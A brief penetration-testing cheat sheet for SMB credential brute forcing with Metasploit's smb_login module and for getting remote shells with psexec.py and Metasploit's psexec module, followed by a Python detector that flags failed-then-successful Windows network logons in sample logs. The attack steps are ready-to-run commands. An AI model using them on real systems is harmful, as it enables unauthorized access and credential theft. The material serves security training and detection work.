Brute force and Login

Brute force with Metasploit

  • Use the Metasploit smb_login module to brute force SMB logins.

    • Whether the brute force succeeds depends on the user list and password list used.

use auxiliary/scanner/smb/smb_login
set RHOSTS <TARGET_IP>
set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
set VERBOSE false
run

Authentication with psexec.py

  • Use the psexec.py script on Linux (from impacket-scripts) to get a command prompt on the target machine with the Administrator account.

    • Using this technique, no exploit is launched or uploaded on the target system.

    • It is a legitimate authentication with the actual credentials and the use of an official tool (psexec).

psexec.py <USERNAME>@<TARGET_IP> cmd.exe

Authentication with the Metasploit psexec module

  • As an alternative to the Python script, use the Metasploit psexec module to get a Meterpreter session on the target system.

    • This technique uploads and runs a (malicious) payload on the target. Pay attention to the antivirus!
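The defender's view of the sequence above, as an added example that is not part of the original page: a burst of failed network logons (Windows Security event 4625, logon type 3) from one source, followed by a successful one (4624), is the trail a password-guessing run that ends in a valid login leaves in the target's Security log. The simplified CSV layout, the sample events and the threshold and window values are constructed assumptions.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample: simplified CSV of Windows Security events
# (timestamp, event_id, logon_type, source_ip, account). Not a real export format.
SAMPLE_LOG = """\
2024-05-01T10:00:00,4625,3,192.0.2.50,admin
2024-05-01T10:00:01,4625,3,192.0.2.50,admin
2024-05-01T10:00:02,4625,3,192.0.2.50,root
2024-05-01T10:00:03,4625,3,192.0.2.50,administrator
2024-05-01T10:00:04,4625,3,192.0.2.50,administrator
2024-05-01T10:00:05,4624,3,192.0.2.50,administrator
2024-05-01T10:02:00,4625,3,192.0.2.10,alice
2024-05-01T10:02:05,4624,3,192.0.2.10,alice
2024-05-01T10:03:00,4624,2,192.0.2.10,alice
"""

FAILED, SUCCESS, NETWORK = 4625, 4624, "3"  # logon type 3 = network (SMB)

def parse(text):
    """Yield (time, event_id, source_ip, account) for network logons only."""
    for line in text.strip().splitlines():
        ts, event_id, logon_type, src, account = line.split(",")
        if logon_type == NETWORK:
            yield datetime.fromisoformat(ts), int(event_id), src, account

def detect(events, threshold=5, window=timedelta(minutes=1)):
    """Alert on >= threshold failures per source inside `window`, and on any
    successful network logon from that source while the burst is still live."""
    failures = defaultdict(deque)  # source_ip -> timestamps of recent failures
    alerts = []
    for ts, event_id, src, account in sorted(events):
        recent = failures[src]
        while recent and ts - recent[0] > window:
            recent.popleft()  # drop failures that fell out of the window
        if event_id == FAILED:
            recent.append(ts)
            if len(recent) == threshold:
                # account = the one tried on the attempt that crossed the threshold
                alerts.append(("guessing", src, account, ts))
        elif event_id == SUCCESS and len(recent) >= threshold:
            alerts.append(("success_after_guessing", src, account, ts))
            recent.clear()
    return alerts

if __name__ == "__main__":
    for alert in detect(parse(SAMPLE_LOG)):
        print(alert)
```

The single mistyped password from 192.0.2.10 stays below the threshold and raises nothing; tune `threshold` and `window` to the environment's normal failure rate.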
